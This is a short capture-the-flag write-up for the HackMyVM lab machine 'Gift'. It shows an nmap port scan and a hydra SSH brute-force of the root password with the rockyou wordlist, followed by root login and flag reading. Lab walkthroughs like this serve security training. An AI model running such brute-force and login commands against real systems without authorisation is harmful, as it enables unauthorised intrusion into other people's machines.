[HackMyVM] Gift

Today we are going to hack the HackMyVM machine called Gift. You can register and download it from the following link: HackMyVM


Enumeration


We start with an nmap scan to see which ports are open.

> nmap -A -p- 192.168.1.54                                                  
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-23 10:30 CET
Nmap scan report for gift.home (192.168.1.54)
Host is up (0.00047s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.3 (protocol 2.0)
80/tcp open  http    nginx
|_http-server-header: nginx
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.81 seconds

We see that SSH and HTTP are open. Looking at the content of the web page and its source code, we find the following.

Dont Overthink. Really, Its simple.
	<-- Trust me -->

It tells us not to overthink it, and that it is simple :) So we go for the simplest option, which is to brute-force the root password.

> hydra -l root 192.168.1.54 -P /usr/share/wordlists/rockyou.txt ssh        
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-17 12:32:45
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://192.168.1.54:22/
[STATUS] 181.00 tries/min, 181 tries in 00:01h, 14344222 to do in 1320:50h, 16 active
[22][ssh] host: 192.168.1.54   login: root   password: simple

After a short while, we have the root password.

Root Shell


With the root password in hand, we log in!

> ssh root@192.168.1.54                                                                                                                       
root@192.168.1.54's password: 
IM AN SSH SERVER
gift:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

user.txt



gift:~# ls
root.txt  user.txt
gift:~# head -c 4 user.txt
HMV6gift:~#

root.txt



gift:~# head -c 4 root.txt 
HMV6gift:~#

End


And with this, we are root on the machine!